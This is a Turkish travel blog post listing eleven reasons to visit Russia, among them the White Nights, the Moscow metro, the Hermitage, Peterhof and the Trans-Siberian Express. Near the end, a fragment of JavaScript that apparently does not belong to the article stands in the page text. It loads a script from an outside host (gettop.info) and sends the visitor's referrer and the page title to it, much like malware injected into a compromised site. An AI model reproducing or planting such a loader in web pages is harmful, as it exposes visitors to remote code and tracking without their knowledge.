Buradasınız: Ana sayfa - Genel - Rusya’ya neden gitmeli ?

Rusya’ya neden gitmeli ?

300x250 reklam kodu buraya Rusya, Çarlık Rusya’sından kalma savaş dönemine ait mimari yapıları, heykelleri ve yaz aylarına damgasını vuran Beyaz Geceler’i ile turizm potansiyelini her geçen gün yükseltiyor.

discover russia Rusyaya neden gitmeli ?

İşte Rusya’yı keşfetmek için 11 neden!

1-Rusya’yı ziyaret için en önemli sebeplerden biri Vizesiz olması. Böylelikle hem vize ücreti ödenmiyor hem de zahmetsiz gidilebiliyor.

 

2-Dünyanın en güzel doğa olaylarından biri, Dostoyevski’nin de kitabına konu olan Beyaz Geceleri
Haziran-Temmuz-Ağustos’ta Rusya’da en güzel haliyle yaşayabilirsiniz.

 

3-Sanatsal etkinlikleri ile ünlenen Rusya’nın dünya çapındaki Bolshoi Tiyatrosuna gitmek seyahatinize ayrıcalık ve keyif katar.

 

Sponsor bağlantılar

468x15 reklam kodu buraya
4-Dünyanın birçok şehrinde metroya binmiş olabilir, metro istasyonlarından da defalarca geçmiş olabilirsiniz. Fotoğraf makinelerinizi hazırlayın, belki aklınızda bir tek Moskova metrosu kalacak! Sırf Moskova metrosunu görmeye bile Rusya’ya gidilebilir.

 

5-Kızıl Meydan ve St.Basil gibi dünyaya damgasını vurmuş, tarihin şekillendiği meydan ve eserleri yerinde görmek son derece etkileci.

 

300x250 reklam kodu buraya
6-Ünlü müzik grubu Scorpions’ın 1990 yılında müzik listelerini alt üst eden “Wind of change” şarkısında da anlattığı üzere, “Gorky Park” stresinizi atıp, doğanın içinde sessizlikte kendinizi dinleyerek yenileneceğiniz çok güzel bir şehir kaçamağı.

 

7-Leonardo Da Vinci, Van Gogh, Michelangelo, Rembrandt, Raphael ve Picasso gibi sanatçıların eserlerinin bulunduğu UNesco tarafından da koruma listesine girmiş, birçok literatürde dünyanın en iyi müzesi olarak kabul edilen Hermitage Müzesi’ni gezmek için bile Rusya’ya gidilir.

 

8-Caz, Pop, Rock, Blues’dan, Elektronik müziğe kadar gece eğlencesinin de çok keyifli olduğu Rus şehirleri, gününü keyifle geçiren turistler için de akşamları bir deşarj olma imkanı sunuyor.

 

Sponsor bağlantılar

468x15 reklam kodu buraya
9-Çarlık dönemindeki otantizmi içinde barındıran, gördüğünüzde sizi hayretler içinde bırakan biraz Baltıklı, biraz Rus ve biraz da Avrupa şehri havasında bulunan, kanalları ve daracık sokakları sebebiyle dünyada kuzeyin Venedik’i olarak adlandırılan St.Petersburg belki de Rusya’nın en güzel şehri.

 

10-37 adet yaldızlı heykelleri, 64 çeşme ve 142 su fıskiyesi ile Baltık denize kadar uzanan su yolları ile Çarlık Rusyasında ünlü Çar Petro’nun yazlık saray olarak yaptırttığı Peterhof Sarayı muhteşem. Hele ki fıskiyelerden harmoni halinde suların fışkırması sizi sizden alıp götüren , rüyalara sürükleyen bir seremoni.

 

11-Dünyanın en güzel coğrafyası olarak adlandırılan ve Rusya’dan başlayıp birçok Rus şehir ve kasabalarını dolaşan Trans Sibirya ekspresi her gezginin ölmeden mutlaka yapmak istediği bir seyahat. Sibirya’ya kadar uzanan bu muhteşem seyahat, fiyatları çok pahalı olması beraberinde belki de dünyada yapabileceğiniz Top 5 içine girebilecek türden iddialı bir seyahat. Tren, doğa, birbirinden güzel mimarisi ile şehir ve kasabalar, farklı coğrafyalara ait insan ve gelenek-görenek çeşitliliği.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if (document.currentScript) {

Etiketler:, , , , , , , , , , , , , , ,

Comments are closed.